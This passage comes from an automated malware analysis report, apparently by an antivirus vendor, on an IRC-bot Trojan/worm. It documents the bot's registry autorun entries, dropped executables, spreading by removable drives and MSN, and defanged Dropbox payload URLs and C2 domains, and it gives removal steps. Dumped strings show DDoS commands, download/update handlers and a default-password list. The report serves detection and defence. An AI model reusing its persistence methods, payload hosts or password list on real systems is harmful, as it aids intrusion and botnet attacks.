"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process iexplorer.exe:1652 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\ASProtect]
"Microsoft" = "iexplorer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 95 6A 96 FF 85 5B C8 1C 64 4E E0 63 AD 95 FF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft" = "iexplorer.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "iexplorer.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process iexplorer.exe:596 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A F0 DF 4F FA C7 18 F0 8C 56 BB 24 8E 9F AF 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5	File path
c2f4665324cbe99a8845e51ea22ec2e5	c:\Documents and Settings\"%CurrentUserName%"\J50H\20.exe
a49236b08836f4a372b842ead2643c5b	c:\Documents and Settings\"%CurrentUserName%"\J50H\rep.exe
30629889480fb1c2aeb17e62f01c8a47	c:\Documents and Settings\"%CurrentUserName%"\L75C\hggjgh.exe
d7f364e0153aadb8cc37f09b3fe4d3ec	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe
93a561b4d6e39d2b962ef9bcf45fba63	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe
a49236b08836f4a372b842ead2643c5b	c:\WINDOWS\csrss.exe
93a561b4d6e39d2b962ef9bcf45fba63	c:\WINDOWS\system.exe
c2f4665324cbe99a8845e51ea22ec2e5	c:\WINDOWS\system32\iexplorer.exe
30629889480fb1c2aeb17e62f01c8a47	c:\WINDOWS\system32\pwyqire.exe
d7f364e0153aadb8cc37f09b3fe4d3ec	c:\WINDOWS\systemj.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.A worm can spread its copies through the MSN Messanger.

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
pwyqire.exe:1312
rep.exe:1920
rep.exe:292
20.exe:464
20.exe:2012
hggjgh.exe:656
hggjgh.exe:1884
systemj.exe:456
system.exe:1088
%original file name%.exe:1036
iexplorer.exe:596
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (1249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe (588384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe (483032 bytes)
%WinDir%\systemj.exe (589016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (169 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[2].txt (169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4916 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (511 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%WinDir%\system.exe (483944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%WinDir%\csrss.exe (5441 bytes)
%Documents and Settings%\%current user%\Q32K34.WE9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (1137 bytes)
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (1241 bytes)
%System%\iexplorer.exe (5873 bytes)
%System%\pwyqire.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1249 bytes)
%Documents and Settings%\%current user%\J50H\20.exe (9665 bytes)
%Documents and Settings%\%current user%\J50H\rep.exe (9665 bytes)
%Documents and Settings%\%current user%\L75C\hggjgh.exe (10537 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (1241 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "pwyqire.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "pwyqire.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft" = "iexplorer.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "iexplorer.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: Language Neutral

Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	74526	74752	4.54396	a8692f5ba740240ef0f9a827376f76f9
.rdata	81920	7445	7680	3.46159	d4f36accffde0bf520f52486679ccf0d
.data	90112	96036	512	2.46008	b6c7edb5b7fec47a37a622cc5d71f3f4
.CRT	188416	32	512	0.273198	439411041ee0b8261668525c5c132cd9
.rsrc	192512	16660	16896	3.52343	a2121b436cc4d10fcdfe9bc7fe4dbc2f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://www.v.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1
hxxp://www.v.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt
hxxp://www.whatismyip.com/	141.101.120.14
hxxp://checkip.dyndns.com/
hxxp://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1	108.160.167.202
hxxp://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1	108.160.167.202
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt	212.30.134.177
hxxp://checkip.dyndns.org/	216.146.43.70
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt	212.30.134.177
videos.p0rn-lover.us	5.39.78.105
frozynv.odin2-valhall.com	23.236.134.61
dl.dropboxusercontent.com	23.23.132.156
vids.p0rn-lover.us	5.39.78.105

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET / HTTP/1.1

Host: VVV.whatismyip.com

Cache-Control: no-cache

HTTP/1.1 403 Forbidden

Server: cloudflare-nginx

Date: Tue, 29 Jul 2014 22:51:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly

Vary: Accept-Encoding

CF-RAY: 151ce0f54a000551-VIE

2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56fdfdabd595bb7e0824849f76a67e152-1406674261-1800",zone:"whatismyip.com",rocket:"a",apps:0}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dokv=97fb4d042e/cloudflare.min.js"><' '\/script>');}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white">.<center><h1>403 Forbidden</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0..HTTP/1.1 403 Forbidden..Server: cloudflare-nginx..Date: Tue, 29 Jul 2014 22:51:01 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly..Vary: Accept-Encoding..CF-RAY: 151ce0f54a000551-VIE..2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56f

<<

<<< skipped >>>

GET / HTTP/1.1

Host: checkip.dyndns.org

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html

Server: DynDNS-CheckIP/1.0

Connection: close

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 107

<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....

GET / HTTP/1.1

Host: checkip.dyndns.org

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html

Server: DynDNS-CheckIP/1.0

Connection: close

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 107

<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT

Accept-Ranges: bytes

ETag: "806f4cbb43dcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Cache-Control: max-age=2736

Date: Tue, 29 Jul 2014 22:50:46 GMT

Connection: keep-alive

X-CCC: RU

X-CID: 2

1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 18..Cache-Control: max-age=2736..Date: Tue, 29 Jul 2014 22:50:46 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..1401CF3DB40B609892..

GET / HTTP/1.1

Host: VVV.whatismyip.com

Cache-Control: no-cache

HTTP/1.1 403 Forbidden

Server: cloudflare-nginx

Date: Tue, 29 Jul 2014 22:51:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5395722fd299f75e2ad4583fe2730e0f1406674261320; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly

Vary: Accept-Encoding

CF-RAY: 151ce0f54a010551-VIE

2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56fdfdabd595bb7e0824849f76a67e152-1406674261-1800",zone:"whatismyip.com",rocket:"a",apps:0}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dokv=97fb4d042e/cloudflare.min.js"><' '\/script>');}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white">.<center><h1>403 Forbidden</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0......

GET / HTTP/1.1

Host: VVV.whatismyip.com

Cache-Control: no-cache

HTTP/1.1 403 Forbidden

Server: cloudflare-nginx

Date: Tue, 29 Jul 2014 22:51:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5ef63b2783e4be02942676df66a2d2e71406674261595; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly

Vary: Accept-Encoding

CF-RAY: 151ce0f6fa580551-VIE

2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56fdfdabd595bb7e0824849f76a67e152-1406674261-1800",zone:"whatismyip.com",rocket:"a",apps:0}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dokv=97fb4d042e/cloudflare.min.js"><' '\/script>');}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white">.<center><h1>403 Forbidden</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0..HTTP/1.1 403 Forbidden..Server: cloudflare-nginx..Date: Tue, 29 Jul 2014 22:51:01 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d5ef63b2783e4be02942676df66a2d2e71406674261595; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly..Vary: Accept-Encoding..CF-RAY: 151ce0f6fa580551-VIE..2ab..<html>.<head><title>403 Forbidden</title> <script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dokv=88e434a982/"},atok:"301e86d4e68b4f9490083018b6e4338d",petok:"9afdeab56f

<<

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT

Accept-Ranges: bytes

ETag: "806f4cbb43dcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Cache-Control: max-age=2736

Date: Tue, 29 Jul 2014 22:50:46 GMT

Connection: keep-alive

X-CCC: RU

X-CID: 2

1401CF3DB40B609892....

GET /msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-x509-ca-cert

Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT

Accept-Ranges: bytes

ETag: "05a791e6fc51:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 1028

Date: Tue, 29 Jul 2014 22:50:46 GMT

Connection: keep-alive

X-CCC: RU

X-CID: 2

0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0.. 0...*.H.............0............W.I.[.._H.......g..eh.Wq.^w...I.p.=V.c.o....?..T"T......u=K..w.>x.... k/j ...~......E'o.7X..&..-.....r6N..?e...*n].............:.....-..._.=.....\.e8.E...``t.A.rb.b..o_.B..Qe..#.j.x..M.....Z..@........^s..w...y....g.....X.D{.>b(_.A.SX..~8t....i...t..........0..0...U............L.q.a.=....j..0....U.#...0..........L.q.a.=....j...g.e0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority...0...U....0....0...*.H.............2K...>........w.3..\......=......ni...0.4.cr8.......(.1.z.T...1X....b..Es..E.$.....#yi...M..L.3#......An.. ....;.p.~.& .T%.ns...!..l.........l......a.... .....r9. ......n...N&.s ...L.&q.a.tJ.W...uH..Qi....a...@..L....C......b......2.. .E...(...*ZW.7.......HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT..Accept-Ranges: bytes..ETag: "05a791e6fc51:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 1028..Date: Tue, 29 Jul 2014 22:50:46 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The

<<

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/2796BAE63F1801E277261BA0D77770028F20EEE4.crt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-x509-ca-cert

Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT

Accept-Ranges: bytes

ETag: "05a791e6fc51:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 1028

Date: Tue, 29 Jul 2014 22:50:47 GMT

Connection: keep-alive

X-CCC: RU

X-CID: 2

0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0.. 0...*.H.............0............W.I.[.._H.......g..eh.Wq.^w...I.p.=V.c.o....?..T"T......u=K..w.>x.... k/j ...~......E'o.7X..&..-.....r6N..?e...*n].............:.....-..._.=.....\.e8.E...``t.A.rb.b..o_.B..Qe..#.j.x..M.....Z..@........^s..w...y....g.....X.D{.>b(_.A.SX..~8t....i...t..........0..0...U............L.q.a.=....j..0....U.#...0..........L.q.a.=....j...g.e0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority...0...U....0....0...*.H.............2K...>........w.3..\......=......ni...0.4.cr8.......(.1.z.T...1X....b..Es..E.$.....#yi...M..L.3#......An.. ....;.p.~.& .T%.ns...!..l.........l......a.... .....r9. ......n...N&.s ...L.&q.a.tJ.W...uH..Qi....a...@..L....C......b......2.. .E...(...*ZW.7.......HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 11 Feb 2005 03:05:40 GMT..Accept-Ranges: bytes..ETag: "05a791e6fc51:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 1028..Date: Tue, 29 Jul 2014 22:50:47 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..0...0...........0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...040629170620Z..340629170620Z0c1.0...U....US1!0...U....The

<<

<<< skipped >>>

GET /s/yec4ibud71nzl4k/120.exe?dl=1 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible)

Host: VVV.dropbox.com

HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Tue, 29 Jul 2014 22:50:44 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: hXXps://VVV.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx..Date: Tue, 29 Jul 2014 22:50:44 GMT..Content-Type: text/html..Content-Length: 178..Connection: keep-alive..Location: hXXps://VVV.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>......

GET /s/eniahgllsch8thw/rep.exe?dl=1 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible)

Host: VVV.dropbox.com

HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Tue, 29 Jul 2014 22:50:44 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: hXXps://VVV.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....

GET / HTTP/1.1

Host: checkip.dyndns.org

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html

Server: DynDNS-CheckIP/1.0

Connection: close

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 107

<html><head><title>Current IP Check</title></head><body>Current IP Address: 193.138.244.231</body></html>....

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

pwyqire.exe_500:

.text

`.rdata

@.data

_WSSh

t1SSSSh

PeekNamedPipe

CreatePipe

KERNEL32.dll

WS2_32.dll

GetCPInfo

%d. %s = %s

[%.2d-%.2d-M %.2d:%.2d:%.2d] %s

[DDoS]: Send error: <%d>.

ddos.random

ddos.ack

ddos.syn

[DOWNLOAD]: Bad URL, or DNS Error: %s.

[UPDATE]: Update failed: Error executing file: %s.

[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.

[DOWNLOAD]: Opened: %s.

[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.

[DOWNLOAD]: CRC Failed (%d != %d).

[DOWNLOAD]: Filesize is incorrect: (%d != %d).

[DOWNLOAD]: Update: %s (%dKB transferred).

[DOWNLOAD]: File download: %s (%dKB transferred).

[DOWNLOAD]: Couldn't open file: %s.

[IDENTD]: Error: server failed, returned: <%d>.

: USERID : UNIX : %s

[IDENTD]: Client connection from IP: %s:%d.

%s %s :%s

PRIVMSG

avicap32.dll

SQLDisconnect

SQLFreeHandle

SQLAllocHandle

SQLExecDirect

SQLSetEnvAttr

SQLDriverConnect

odbc32.dll

ShellExecuteA

shell32.dll

mpr.dll

iphlpapi.dll

dnsapi.dll

netapi32.dll

icmp.dll

Mozilla/4.0 (compatible)

InternetCrackUrlA

InternetOpenUrlA

HttpSendRequestA

HttpOpenRequestA

wininet.dll

ws2_32.dll

gdi32.dll

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

advapi32.dll

ExitWindowsEx

user32.dll

kernel32.dll

Avicap32.dll failed. <%d>

Odbc32.dll failed. <%d>

Shell32.dll failed. <%d>

Mpr32.dll failed. <%d>

Iphlpapi.dll failed. <%d>

Dnsapi.dll failed. <%d>

Netapi32.dll failed. <%d>

Icmp.dll failed. <%d>

Wininet.dll failed. <%d>

Ws2_32.dll failed. <%d>

Gdi32.dll failed. <%d>

Advapi32.dll failed. <%d>

User32.dll failed. <%d>

Kernel32.dll failed. <%d>

videos.p0rn-lover.us

support.exe

Supports RAS Connections

g.dat

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\RunServices

winpass

sqlpassoainstall

databasepassword

databasepass

dbpassword

dbpass

domainpassword

domainpass

loginpass

login

windows

1234567890

123456789

12345678

1234567

pass1234

passwd

password

password1

*@fbi.edu

Ý %dh %dm

[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.

[IDENTD]: Failed to start server, error: <%d>.

[IDENTD]: Server running on Port: 113.

%s %d "%s"

%s\%s

[MAIN]: Connected to %s.

NICK %s

USER %s 0 0 :%s

PASS %s

MODE %s %s

USERHOST %s

[MAIN]: User: %s logged in.

[MAIN]: Password accepted.

[MAIN]: *Failed host auth by: (%s!%s).

NOTICE %s :Host Auth failed (%s!%s).

[MAIN]: *Failed pass auth by: (%s!%s).

